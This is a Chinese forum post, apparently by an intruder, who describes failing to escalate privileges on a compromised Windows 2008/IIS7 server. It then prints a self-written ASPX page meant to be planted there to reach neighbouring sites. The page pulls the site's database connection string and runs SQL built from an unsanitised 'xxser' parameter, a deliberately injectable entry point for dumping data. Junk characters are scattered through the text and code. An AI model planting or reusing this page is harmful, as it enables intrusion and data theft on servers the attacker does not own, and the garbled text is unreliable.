昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。3 d* [+ }4 l+ l2 |
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
! E, d x" W% n- a, Y6 B$ G$ g8 g; o代码量不多,自己写个拉倒了。烦死了。6 N: f2 i* [0 S' g
, J' K# s) X' Y% {/ G/ |) [
% h$ y* H i" k3 i& M) m$ u- f<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">7 t- a- ]5 f1 C5 ]3 N% [
<html xmlns="http://www.w3.org/1999/xhtml">
4 U2 F; p: t8 g% U9 c6 {/ z" d<head runat="server">
0 X3 f# d6 R$ v F" }8 Y: }2 o <title>暗影aspx构造注射专用页面</title>; c5 T) H% \/ g2 w
</head> c+ ?% L- l( ^+ [! i9 M8 Z2 z
<body>
Y8 X/ l1 \% S. `/ t6 @ <form id="form1" runat="server">
: @; z1 u5 j. O2 N& Q, B# \ <div>! c% ~- b% r' R
<script language="c#" runat="server">
/ L$ r- I8 p) ?; s, v) T" U - Q# E+ r, K0 {. T& F4 l, Q
void page_init(object sender, EventArgs e)9 {0 y0 C* S' Z8 f
{
: B; j7 R9 z8 h8 w7 X$ b+ |5 {
, g- E4 J" R0 d0 p; n/ j System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
+ C, G8 N2 j a0 q) e& Q
" R, l) ]' i. j/ _) x conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();% j$ x+ o" B# S8 D
conn.Open();
: R' p0 c6 m& i! v* { ! ?' Z) F& J* |2 k
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
4 i: m4 Z" u& A2 F / ^- S' P* W6 O/ ?
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
, J8 J2 p, b0 V7 {1 C int x = command.ExecuteNonQuery();9 u& t$ |* R# }+ Y6 I9 a) h4 V
Response.Write(i+"\n");2 A$ z& S, M1 S& d" b$ X& u- g4 w$ D
Response.Write(x);
5 ? {: z: r( \/ z conn.Close();
" I; D: S2 P# e0 L6 D5 |; k }8 Z: W: j3 K& B1 \
7 K3 _2 m# ~! P
</script>% T3 a" H/ w9 l! k$ q7 u
</div># s% b W* [/ w! ^& Y) i" v
</form>* b2 x( a0 z. p. K& d6 e
</body>+ o) S7 k4 B( {, p
</html>
& i5 f9 y6 r4 K4 [ |